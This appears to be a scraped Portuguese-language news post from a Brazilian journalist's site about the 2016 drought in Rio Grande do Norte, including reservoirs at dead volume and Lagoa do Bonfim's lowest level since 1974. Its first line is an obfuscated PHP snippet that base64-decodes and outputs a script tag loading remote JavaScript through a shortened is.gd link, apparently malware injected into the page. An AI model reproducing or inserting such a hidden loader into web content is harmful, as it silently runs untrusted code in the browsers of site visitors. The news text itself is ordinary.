$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Crise hídrica no RN: Lagoa do Bonfim atinge menor nível desde 1974

03 Jan 2016

O último levantamento do Instituto de Gestão de Águas do Rio Grande do Norte mostrou que 18 açudes estão em volume morto. Isso quer dizer 38% dos monitorados pelo Estado. E outros 11 reservatórios estão secos. A projeção feita pelo Igarn mostra que, se o quadro de seca for confirmado para o próximo ano, outros 22 reservatórios irão secar até o final de 2016. A barragem Armando Ribeiro Gonçalves só tem água para até agosto do próximo ano. O reservatório que irá “mais longe” com seu reservatório hoje é a barragem de Santa Cruz do Apodi que está com 31,4% e irá até maio de 2019.

Uma mostra da seca que assola o Rio Grande do Norte está na Lagoa do Bonfim. O reservatório atingiu o menor nível desde 1974.

 

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *